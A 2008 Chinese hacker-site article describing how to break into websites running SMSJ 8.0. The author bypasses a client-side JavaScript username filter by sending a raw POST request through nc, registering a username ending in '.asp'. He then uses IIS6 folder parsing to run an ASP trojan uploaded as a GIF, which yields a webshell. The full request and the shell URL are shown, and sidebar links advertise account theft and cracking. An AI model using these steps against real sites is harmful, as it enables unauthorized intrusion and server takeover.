设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 网络安全 -> 文章内容 [站内搜索]  

 
最新SMSJ Version 8.0漏洞
作者:不详  来源:网络  发布时间:2008-3-29 9:35:13  发布人:www.hack86.com
最新SMSJ Version 8.0漏洞 
 

作者:rover
帮朋友检测网站的安全性,用的是SMSJ Version 8.0,号称仿阿里巴巴的东西,注册企业会员后,登录管理,发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩,想起早期动易的那个注册漏洞
说起这个漏洞,完全是iis6引起的,在iis6的站点上,建立一个xx.asp的文件夹,然后在里面放一个改成gif后缀的asp木马,照样会按asp来执行,看了下服务器,八成是win2003,也就是iis6了然后我试着注册rover.asp的用户,注册那里到是过滤了特殊字符的,但是看了下,只是用简单的javascript限制的
代码如下:

function checkdata() {
if( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·用户名必须是2-16位的数字、英文或下划线")
return false;ok,抓包,然后用nc提交,直接绕过

抓包内容

POST /reg_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 

application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.rover.com/reg.asp?action=reg
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; 

.NET CLR 2.0.50727)
Host: www.rover.com
Content-Length: 230
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0; 

ltime=1206546036500; cnzz_eid=96831333-

user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a

dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384

76564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17

nc ip 80成功注册,然后把asp木马改成gif后缀,当图片上传上去
http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif
自此得到webshell,over~最近懒的说话,懒得修饰文笔,看不懂的就一直跳过跳过...
ps:漏洞很简单,好久不写字了,纯粹憋字而已,见笑了,此外,还可以本地提交注册<-- Added by RelatedTopic, plugin for Bo-Blog 2.0.0 -->  
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  最新Oblog4.6注入漏..
最新Oblog4.6注入漏..
最新突破7天限制QQ秀..
最新突破7天限制QQ秀..
12-05 今日最新代理..
最新N款从韩国偷过来..
黑客入侵四种最新发..
QQ空间最新非主流MM..
如何起诉垃圾邮件发..
QQ最新版本将采用数..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
8款QQ空间免费开场动画
免费QQ蓝钻体验(附考试答案)
 
英国电信(BT)被指监视36000余名互.. 04-07
解决“网际快车”和“迅雷”右键.. 04-07
Firefox2狂占CPU解决办法 04-07
ACTCMS网站管理系统cookie注入 04-07
大水牛下载者手工清除的方法 04-07
用vbs加用户的绝妙方法 04-07
妙用终截者密码锁防止木马注入Ex.. 04-07
微软“吃定”雅虎了 04-07
动用黑客拦截他的网络艳遇 04-07
我从1.7万到100万的艰苦历程 04-07
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com